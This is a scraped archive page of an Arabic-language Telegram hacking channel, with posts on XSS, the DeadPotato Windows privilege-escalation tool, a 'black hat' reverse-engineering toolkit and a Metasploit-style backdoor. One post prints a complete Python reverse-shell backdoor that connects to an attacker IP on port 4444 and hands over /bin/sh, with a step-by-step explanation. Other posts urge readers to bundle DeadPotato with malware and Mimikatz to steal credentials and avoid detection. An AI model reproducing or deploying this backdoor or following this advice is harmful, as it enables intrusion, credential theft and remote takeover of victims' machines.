KILLER CODE
Открыть в Telegram
Нет данных
Подписчики
-224 часа
-187 дней
+25330 дней
Архив постов
الكود ده هيتنفذ مباشرة على الصفحة وده معناه إن أي مستخدم يفتح الصفحة دي بعد كده هيتعرض للثغرة اللي ممكن الهاكر يستغلها في سرقة الكوكيز الخاصة بالمستخدم أو تنفيذ أكواد خبيثة تؤدي لسرقة الجلسات أو حتى حقن أكواد ضارة عشان تسرق بيانات تانية أكتر حساسية زي الـ Tokens اللي بتستخدم في الجلسات أو البيانات الشخصية المشكلة في النوع ده من الثغرات إنها بتسبب تهديد حقيقي لأمان التطبيق والمستخدمين وكمان بتعتبر من الثغرات اللي ممكن تستغل بسهولة كبيرة لو المطورين مش بياخدوا بالهم من كيفية التعامل مع المدخلات بطريقة آمنة الحلول الأساسية لتفادي النوع ده من الثغرات بتتمثل في استخدام طرق آمنة لعرض البيانات زي textContent أو التأكد من تطهير المدخلات عن طريق استخدام مكتبات متخصصة لتطهير المدخلات زي DOMPurify اللي بتنضف المدخلات من أي أكواد ضارة وتمنع تنفيذ أي أكواد JavaScript غير مرغوب فيها بالإضافة لإن المطور لازم يكون واعي لفكرة الـ Content Security Policy (CSP) واللي بيسمح للمطور يحدد مصادر الأكواد اللي ممكن تتنفذ على الصفحة ودي بتقلل بشكل كبير احتمالية تنفيذ أي ميليشيوس كودز","datePublished":"2024-11-24T10:44:08Z","dateModified":"2024-11-24T10:44:08Z","author":{"@type":"Organization","name":"KILLER CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"publisher":{"@type":"Organization","name":"KILLER CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":256},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":1},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":6}]}},{"@type":"ListItem","position":2,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/170","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/170","mainEntityOfPage":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/170","headline":"السكريبت اللي بنتكلم عنه هنا هو \"DeadPotato\" واللي بيعتبر واحد من الأدوات القوية في عالم الهجوم على أنظمة الو…","articleBody":"السكريبت اللي بنتكلم عنه هنا هو \"DeadPotato\" واللي بيعتبر واحد من الأدوات القوية في عالم الهجوم على أنظمة الويندوز تحديدا في سيناريوهات التصعيد للامتيازات أو الـ Privilege Escalation ودي واحدة من أخطر وأهم الخطوات في أي عملية هجوم ناجحة على أي نظام لأنه بمجرد ما المخترق يقدر يرفع مستوى صلاحياته على الجهاز بيبقى ليه سيطرة كاملة على النظام وبيقدر ينفذ أوامر خطيرة ويثبت برامج ضارة أو مالوير ويجمع معلومات حساسة والسكريبت ده مبني على فكرة استغلال ثغرات قديمة في أنظمة ويندوز زي ثغرة الـ RottenPotato أو JuicyPotato واللي بتسمح للمخترق إنه يستخدم صلاحيات الـ SYSTEM أو الـ Administrator على الجهاز المستهدف من خلال التلاعب ببعض البروتوكولات اللي بيستخدمها ويندوز للتواصل بين العمليات الداخلية في النظام زي الـ DCOM والـ RPC اللي هما Distributed Component Object Model وRemote Procedure Call على التوالي.\n\nالـ DeadPotato بيسمح للمهاجم إنه ينفذ كود معين بصلاحيات عالية من غير ما يكون ليه وصول مباشر لصلاحيات الـ SYSTEM في الأول ودي نقطة مهمة جدا لأن معظم العمليات اللي بتحصل على النظام بتكون بصلاحيات محدودة يعني مش كل واحد يستخدم الكمبيوتر أو السيرفر عنده صلاحيات النظام بالكامل وده اللي بيخلي اختراق الأنظمة الحديثة أكتر تعقيدا وأصعب لكن باستخدام DeadPotato بيتمكن المهاجم إنه يستغل حاجة اسمها NTLM Relay Attack علشان يوصل للـ SYSTEM privileges على الجهاز المصاب من غير ما يكون عنده أصلا الوصول المباشر ليها.\n\nبخصوص تصحيح المعلومة وتنسيقها بشكل علمي أكتر خلينا نقول إن استغلال الـ NTLM Relay في DeadPotato بيتم من خلال إرسال طلبات تصديق مزورة للـ NTLM protocol داخل النظام ده بيتم عن طريق خداع الخدمة اللي بتمشي الطلبات دي زي خدمة COM أو DCOM اللي هي أساسا بتمشي طلبات بينها وبين الـ LSASS اللي هي Local Security Authority Subsystem Service المسؤولة عن إدارة سياسات الأمان وعمليات التوثيق في ويندوز واللي بيحصل هنا إن السكريبت بيعمل حاجة اسمها \"Token Impersonation\" واللي بتسمح للمهاجم بأنه يقلد صلاحيات المستخدم الموثق بحيث إنه يقدر ينفذ أي أمر أو ينزل أي برنامج ضار بصلاحيات أعلى بكثير من اللي كان يقدر ينفذها لوحده في الحالة الطبيعية.\n\nلو انت بتهدف إنك تدمج DeadPotato مع مالوير معين علشان تنفذ هجوم شامل وقوي على أنظمة ويندوز لازم تفكر بطريقة البلاك هات اللي هي المخترقين اللي بيستخدموا مهاراتهم لشن هجمات ضارة وإلحاق أذى حقيقي أو سرقة بيانات ومعلومات مالية وحساسة لما تدمر الحماية على النظام باستخدام DeadPotato هتقدر بعد كده تدخل المالوير بتاعك بشكل سلس وبدون ما يتم اكتشافه بسهولة خصوصا لو عملت باندنغ مع سكريبت تاني زي Mimikatz اللي بيتيح لك استخراج التوكينز وكلمات المرور من الذاكرة واللي بيسمح لك أنك تكمل الهجوم بتاعك بشكل أسرع وأنجح وتسيطر على الشبكة كلها.\n\nقوة DeadPotato بتيجي من إنه بيستغل البروتوكولات اللي هي أصلا جزء أساسي من نظام التشغيل وماحدش يقدر يقفلها بسهولة لأن لو قفلتها هتعطل حاجات تانية في السيستم يعني المهاجم بيلعب على حتة حساسة جدا في النظام علشان كده الهجوم بيبقى خطير وصعب الحماية ضده وفي نفس الوقت بيسهل دمج الهجمات دي في مالوير لأنك بتضمن إن مالويرك هيشتغل بصلاحيات عالية وبدون ما يحتاج إنه يكسر حماية كبيرة في البداية.\n\nرابط المشروع على جيت هوب","datePublished":"2024-11-24T00:38:37Z","dateModified":"2024-11-24T00:38:37Z","author":{"@type":"Organization","name":"KILLER CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"publisher":{"@type":"Organization","name":"KILLER CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":276},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":6},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":8}]}},{"@type":"ListItem","position":3,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/168","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/168","mainEntityOfPage":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/168","headline":"مشروع Indetectables Toolkit اللي موجود على GitHub هو مكتبة مفتوحة المصدر بتضم مجموعة أدوات وتقنيات متقدمة مخص…","articleBody":"مشروع Indetectables Toolkit اللي موجود على GitHub هو مكتبة مفتوحة المصدر بتضم مجموعة أدوات وتقنيات متقدمة مخصصة لتحليل البرمجيات الخبيثة والهندسة العكسية وكمان تطوير أو كسر حماية البرمجيات وهو مشروع بيستهدف بشكل أساسي المهتمين بالأمن السيبراني سواء محترفين أو هاكرز بس لو بنتكلم في سياق البلاك هات فهو يعتبر كنز لأي شخص عايز يعزز مهاراته في تطوير الأدوات أو اختراق الأنظمة لأن المشروع بيوفر بيئة جاهزة للتجربة والتطوير واللي يميزه إنه بيشتغل بشكل عام على ملفات التنفيذ سواء EXE أو DLL وبيساعد على تحليل الكود الخاص بيها وفهم العمليات اللي بتحصل داخل البرامج وخاصة العمليات اللي بتتعامل مع الذاكرة زي Buffer Management أو عمليات التحميل الديناميكي للملفات \n\nالبلاك هات ممكن يستخدم المشروع ده بشكل مباشر في تحليل الثغرات داخل البرمجيات أو الأنظمة المستهدفة لأن الأدوات دي بتوفر وسائل لفهم كيفية تعامل التطبيقات مع المدخلات والبيانات وبكده يقدر الهكر يكتشف أخطاء في الأكواد زي Buffer Overflow أو Heap Exploitation اللي بتظهر لما البرنامج يستقبل بيانات أكتر من حجم الذاكرة المخصص ليها وده بيتيح تنفيذ أكواد ضارة جوه البرنامج المستهدف بالإضافة إلى إن الأدوات دي بتشتغل على مستوى متقدم من الهندسة العكسية وبتساعد الهكر في فك التشفير أو الحماية اللي بتكون موجودة على البرامج زي آليات Licensing Systems أو DRM واللي بتستخدم لحماية البرامج من النسخ أو التعديل \n\nلو الهكر عنده خلفية برمجية قوية ممكن يطوّر الأدوات دي عشان تبقى أكتر تعقيداً وفعالية زي إنه يضيف تقنيات لتعتيم الكود Obfuscation واللي بتساعد على إخفاء البرمجيات الخبيثة من برامج الحماية أو يدمجها مع مكتبات زي Radare2 أو Capstone اللي بتقدم إمكانيات تحليل متقدم للأكواد الثنائية وممكن كمان يضيف إمكانيات لتحليل الشبكات مع البرامج دي باستخدام مكتبات زي Scapy لتحليل حزم البيانات أو إدخال وظائف لتوليد Payloads متطورة تقدر تخترق الأنظمة الحديثة \n\nمن الأفكار اللي ممكن الهكر يدمجها مع المشروع هي إنه يضيف تقنيات استغلال Automated Exploitation عشان يخلي الأدوات بتشتغل تلقائياً على اكتشاف واستغلال الثغرات وممكن كمان يدمج المشروع مع أدوات متطورة زي IDA Pro أو Ghidra لتحليل البرمجيات بشكل أعمق وفك الكود المصدري بشكل أوضح واللي هيتيح للهكر مش بس فهم الكود لكن كمان إعادة بنائه أو تعديله بما يناسب احتياجاته \n\nفي مجال كسر البرامج الأدوات دي بتساعد الهكر في فك حماية البرامج من خلال تحليل الـ Binary Code وإيجاد النقاط اللي فيها عمليات تحقق التراخيص ودي ممكن يتم تجاوزها بسهولة باستخدام تقنيات Patch Based Exploitation اللي بتعدل على الكود الموجود جوه الملف التنفيذي أو إدخال تقنيات مثل Code Injection لإضافة تعليمات برمجية جديدة تخدم الغرض المطلوب وفي مجال اكتشاف الثغرات الأدوات دي ممكن تستخدم لفحص الأماكن اللي بيتم فيها تخصيص الذاكرة جوه التطبيقات وتحليل الـ Stack Frames بشكل يدوي أو تلقائي عشان يكتشف الهكر الأماكن اللي ممكن يحصل فيها تجاوز للذاكرة أو Access Violations ودي أكتر الأماكن اللي بيتم استغلالها في الثغرات الحديثة \n\nالهكر اللي عايز يطور الأدوات دي ممكن كمان يستغل الذكاء الاصطناعي في تحليل الأكواد دي بشكل أسرع ويدمج خوارزميات Machine Learning لتحديد الأماكن اللي ممكن تكون عرضة للاستغلال بشكل تلقائي وكمان ممكن يطور واجهة رسومية للمشروع عشان يبقى سهل الاستخدام حتى للي معندوش خبرة كبيرة في التعامل مع الأدوات التقليدية وأخيراً المشروع يعتبر منصة مفتوحة لأي شخص عايز يتعلم أو يطور في مجال الأمن السيبراني والهندسة العكسية بشرط يكون عنده أساسيات برمجية قوية ومهارات تحليلية\n\nرابط المشروع على جيت هوب","datePublished":"2024-11-23T20:43:36Z","dateModified":"2024-11-23T20:43:36Z","author":{"@type":"Organization","name":"KILLER CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"publisher":{"@type":"Organization","name":"KILLER CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":321},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":4},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":15}]}},{"@type":"ListItem","position":4,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/167","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/167","mainEntityOfPage":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/167","headline":"KILLER CODE","datePublished":"2024-11-23T16:36:00Z","dateModified":"2024-11-23T16:36:00Z","author":{"@type":"Organization","name":"KILLER CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"publisher":{"@type":"Organization","name":"KILLER CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":316},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":26}]}},{"@type":"ListItem","position":5,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/166","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/166","mainEntityOfPage":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/166","headline":"KILLER CODE","datePublished":"2024-11-23T16:36:00Z","dateModified":"2024-11-23T16:36:00Z","author":{"@type":"Organization","name":"KILLER CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"publisher":{"@type":"Organization","name":"KILLER CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":313},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":24}]}},{"@type":"ListItem","position":6,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/165","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/165","mainEntityOfPage":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/165","headline":"#Exclusive 🔥 #TrainSec | Malware Analyst Professional - Level 1 (2023) Info : https://training.trainsec.net/m…","articleBody":"#Exclusive 🔥\n\n#TrainSec | Malware Analyst Professional - Level 1 (2023)\n\nInfo : https://training.trainsec.net/malware-analyst-professional-level-1\n\nالدورة دي اللي موجودة على موقع Training TrainSec اسمها Malware Analyst Professional Level 1 ودي دورة متخصصة في تحليل البرمجيات الخبيثة يعني بتعلمك ازاي تكتشف وتحلل المالوير بشكل احترافي ودي حاجة مهمة لأي هكر عايز يطور من نفسه ويزود مهاراته الأمنية الدورة دي بتبدأ معاك من الأساسيات وبتشرحلك بشكل عملي إزاي تتعامل مع أنواع مختلفة من المالوير زي الفيروسات والدود وبرامج التجسس والتروجانات وده مش بس بيكون نظري لكن عملي كمان هتتعلم ازاي تفك شفرات المالوير وتفهم طريقة عمله وده عن طريق استخدام أدوات متخصصة زي IDA Pro و OllyDbg و Wireshark ودي أدوات قوية جدا في تحليل المالوير وفهم طريقة عمله كمان هتتعلم إزاي تكتب تقارير تحليلية مفصلة عن المالوير وده مهم عشان تقدر توصل المعلومات بطريقة مفهومة وواضحة لفريق الأمن السيبراني أو لأي جهة مهتمة بالتحليل اللي عملته التدريب ده كمان بيكون فيه أمثلة حقيقية وحالات عملية بتخليك تواجه التحديات اللي ممكن تقابلك في الواقع وتعرف إزاي تتعامل معاها بشكل احترافي ومش بس كده ده كمان بيخليك تكتسب خبرة عملية ومهارات تحليلية عالية بتخليك تقدر تكتشف الثغرات ونقاط الضعف اللي المالوير بيستغلها وتقدر تحط استراتيجيات لحماية الأنظمة والشبكات منها وكل ده بيساعدك إنك تكون محلل مالوير محترف وتقدر تتعامل مع أي تهديد أمني بثقة وكفاءة ومن الفوائد الكبيرة اللي هتحصل عليها من الدورة دي إنك هتقدر تطور من مهاراتك الشخصية وتزود من فرصك المهنية لأن الشركات النهارده بقت بتدور على الناس اللي عندها خبرة في تحليل المالوير وحماية الأنظمة من التهديدات الأمنية وكمان ده بيفتح لك أبواب جديدة في مجالات زي التحقيقات الجنائية الرقمية والأمن السيبراني بشكل عام في النهاية التدريب ده مش مجرد دورة تعليمية لكن هو استثمار في نفسك وفي مستقبلك المهني وبيساعدك إنك تكون واحد من الخبراء في مجال تحليل المالوير وتكون عندك القدرة على حماية الأنظمة والشبكات من التهديدات المتطورة اللي بتواجهها النهارده","datePublished":"2024-11-23T16:36:00Z","dateModified":"2024-11-23T16:36:00Z","author":{"@type":"Organization","name":"KILLER CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"publisher":{"@type":"Organization","name":"KILLER CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":308},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":4},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":19}]}},{"@type":"ListItem","position":7,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/164","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/164","mainEntityOfPage":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/164","headline":"الكود الخاص بالباك دور meterpreter_reverse_tcp المكتوب بلغة البايثون بيستخدم لتحكم كامل في الجهاز المصاب عن ب…","articleBody":"الكود الخاص بالباك دور meterpreter_reverse_tcp المكتوب بلغة البايثون بيستخدم لتحكم كامل في الجهاز المصاب عن بعد عبر اتصال عكسي ببروتوكول TCP. هنشرح الكود كامل خطوة بخطوة يا شباب تابعوا الشرح معايا :\n\nimport socket\nimport subprocess\nimport os\nimport time\nفي البداية الكود بيستورد مكتبات البايثون الأساسية:\n- socket: عشان نقدر نتصل بالشبكة وننشيء اتصالات.\n- subprocess: عشان نقدر ننفذ أوامر النظام.\n- os: عشان نقدر نتعامل مع نظام التشغيل.\n- time: عشان نقدر نستخدم دوال الوقت والتأخير.\n\ndef connect():\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((\"192.168.1.3\", 4444))\n os.dup2(s.fileno(), 0)\n os.dup2(s.fileno(), 1)\n os.dup2(s.fileno(), 2)\n p = subprocess.call([\"/bin/sh\", \"-i\"])\nدالة connect بتعمل الآتي:\n- بتنشئ socket باستخدام socket.AF_INET اللي بيحدد استخدام IPv4 وsocket.SOCK_STREAM اللي بيحدد استخدام بروتوكول TCP.\n- بتبدأ الاتصال بـ handler اللي شغال على جهاز المهاجم على IP 192.168.1.3 وبورت 4444.\n- بعد ما الاتصال يتم، بتستخدم os.dup2 عشان توجه الإدخال (stdin)، الإخراج (stdout)، والخطأ القياسي (stderr) للـsocket ده معناه إن أي حاجة تكتب في الشل (shell) هتتبعت لجهاز المهاجم والعكس.\n- في النهاية بتشغل شل /bin/sh عشان تتيح للمهاجم تنفيذ الأوامر على الجهاز المصاب.\n\nwhile True:\n try:\n connect()\n except:\n time.sleep(5)\n continue\nفي الجزء ده الكود بيدخل في حلقة لا نهائية while True، وبيحاول ينفذ دالة connect لو حصل أي خطأ أثناء الاتصال زي إن السيرفر مش شغال أو إن الاتصال تقطع، الكود بيستنى 5 ثواني باستخدام time.sleep(5) قبل ما يحاول الاتصال تاني ده بيضمن إن الباك دور يفضل يحاول الاتصال لحد ما ينجح.\n\nده شرح كامل للكود. الكود بيتم حقنه في الجهاز المستهدف عن طريق استغلال معين زي ثغرة في النظام أو في برنامج معين بعد ما الكود يتحقن الجهاز المصاب بيبدأ الاتصال بجهاز المهاجم اللي شغال عليه الميتاسبلويت واللي بيكون مستني الاتصال على الـIP والبورت المحددين في الكود بمجرد ما الاتصال يتم، المهاجم بيحصل على جلسة تحكم كاملة بالجهاز المصاب وبيقدر ينفذ أوامر النظام، يرفع ملفات، ينزل ملفات، يشغل برمجيات خبيثة، يجمع معلومات عن الجهاز، أو يتحكم في العمليات اللي شغالة عليه.\n\nباختصار الباك دور meterpreter_reverse_tcp هو حمولة بتستخدم للتحكم في الأنظمة المصابة عن بعد عبر اتصال TCP عكسي بتتيح للمهاجم تنفيذ أوامر وجمع معلومات والتحكم الكامل في الجهاز المصاب الكود مكتوب بلغة البايثون وبيتم حقنه في النظام المستهدف عن طريق استغلال معين عشان يعمل جلسة تحكم meterpreter","datePublished":"2024-11-23T16:35:20Z","dateModified":"2024-11-23T16:35:20Z","author":{"@type":"Organization","name":"KILLER CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"publisher":{"@type":"Organization","name":"KILLER CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":293},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":1},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":12}]}},{"@type":"ListItem","position":8,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/163","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/163","mainEntityOfPage":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/163","headline":"الباك دور اللي بنتكلم عنه هو meterpreter_reverse_tcp اللي موجود في الميتاسبلويت هو عبارة عن حمولة بيتم حقنها…","articleBody":"الباك دور اللي بنتكلم عنه هو meterpreter_reverse_tcp اللي موجود في الميتاسبلويت هو عبارة عن حمولة بيتم حقنها في النظام المستهدف عن طريق استغلال معين وبتتيح للمهاجم التحكم الكامل في الجهاز المصاب من خلال اتصال يتم عكسه من الجهاز المصاب لجهاز المهاجم عبر بروتوكول الـTCP. يعني الجهاز المصاب هو اللي بيبعت الاتصال لجهاز المهاجم عشان يعمل جلسة تحكم meterpreter بيشتغل زي الشل (shell) بس بشكل متطور وبيوفر أوامر ووظائف كتير للمهاجم زي رفع الملفات تنزيل الملفات تنفيذ الأوامر تشغيل البرمجيات الخبيثة جمع المعلومات من النظام المصاب التحكم في العمليات اللي شغالة على الجهاز وغيرهم من الوظائف\n\nالكود الخاص بالـmeterpreter_reverse_tcp مكتوب بلغة البايثون عشان يقدر يشتغل على الأنظمة اللي بتدعم البايثون وعشان كمان يكون سهل تعديله وتحليله. الكود بيتضمن دوال مختلفة لتنفيذ الأوامر وجمع المعلومات والاتصال بالـhandler اللي بيشتغل على جهاز المهاجم. الكود بيبدأ بتحميل المكتبات اللازمة زي sys وsocket وstruct وغيرهم بعد كده بيتم تعريف الدوال الرئيسية زي دالة الاتصال اللي بتعمل socket وبتبدأ الاتصال بالـhandler. بعد كده بيتم تعريف دوال تانية لتنفيذ الأوامر وجمع البيانات زي دالة execute_command اللي بتاخد الأمر وتنفذه على الجهاز المصاب وترجع النتيجة للـhandler.\n\nمن الأوامر المهمة في meterpreter: أمر sysinfo اللي بيجمع معلومات عن النظام زي اسم الجهاز نظام التشغيل المعالج الرام وغيرها من المعلومات وأمر ps اللي بيعرض العمليات اللي شغالة على الجهاز وأمر migrate اللي بينقل الـmeterpreter من عملية للتانية عشان يفضل شغال لو العملية الأصلية اتقفلت وأمر upload وdownload لرفع وتنزيل الملفات وأمر webcam_snap لتشغيل الكاميرا وأخذ صورة وأمر record_mic لتسجيل الصوت من الميكروفون. دول بعض الأمثلة على الأوامر اللي بيقدر المهاجم ينفذها عن طريق meterpreter\n\nطريقة البناء بتبدأ بكتابة الكود في ملف بايثون وتحديد كل الأوامر والدوال المطلوبة بعد كده بيتم إضافة الكود ده كحمولة (payload) في الميتاسبلويت وتحديد استغلال معين يستخدم الحمولة دي يعني بيتم تحديد ثغرة معينة أو طريقة للوصول للنظام المستهدف وحقن الكود فيه بعد نجاح الحقن بيتم تنفيذ الكود وبدء الاتصال بجهاز المهاجم لعمل جلسة تحكم meterpreter.\n\nباختصار meterpreter_reverse_tcp هو حمولة بتستخدم للتحكم في الأنظمة المصابة عن بعد عبر اتصال TCP عكسي بتتيح للمهاجم تنفيذ أوامر وجمع معلومات والتحكم الكامل في الجهاز المصاب الكود مكتوب بلغة البايثون وبيتم حقنه في النظام المستهدف عن طريق استغلال معين عشان يعمل جلسة تحكم meterpreter.","datePublished":"2024-11-23T16:35:20Z","dateModified":"2024-11-23T16:35:20Z","author":{"@type":"Organization","name":"KILLER CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"publisher":{"@type":"Organization","name":"KILLER CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":276},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":1},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":10}]}},{"@type":"ListItem","position":9,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/162","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/162","mainEntityOfPage":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/162","headline":"انشاء باكدور بلغة البايثون و الاتصال العكسي به يكون عبر الميتاسيلويت الباكدور هذا لجميع الانظمة 🔴 https://git…","articleBody":"انشاء باكدور بلغة البايثون و الاتصال العكسي به يكون عبر الميتاسيلويت\nالباكدور هذا لجميع الانظمة 🔴\n\nhttps://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/python/meterpreter/reverse_tcp.md","datePublished":"2024-11-23T16:35:20Z","dateModified":"2024-11-23T16:35:20Z","author":{"@type":"Organization","name":"KILLER CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"publisher":{"@type":"Organization","name":"KILLER CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":236},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":1},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":9}]}},{"@type":"ListItem","position":10,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/161","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/161","mainEntityOfPage":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/161","headline":"KILLER CODE","datePublished":"2024-11-23T14:54:47Z","dateModified":"2024-11-23T14:54:47Z","author":{"@type":"Organization","name":"KILLER CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"publisher":{"@type":"Organization","name":"KILLER CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":216},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":6},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":2}]}},{"@type":"ListItem","position":11,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/160","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/160","mainEntityOfPage":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/160","headline":"شغال أصلح جهاز واحد من بعيد و بظبط له الجهاز و بحمل كامل متطلبات الجهاز 🪟","articleBody":"شغال أصلح جهاز واحد من بعيد و بظبط له الجهاز و بحمل كامل متطلبات الجهاز 🪟","datePublished":"2024-11-23T14:45:50Z","dateModified":"2024-11-23T14:45:50Z","author":{"@type":"Organization","name":"KILLER CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"publisher":{"@type":"Organization","name":"KILLER 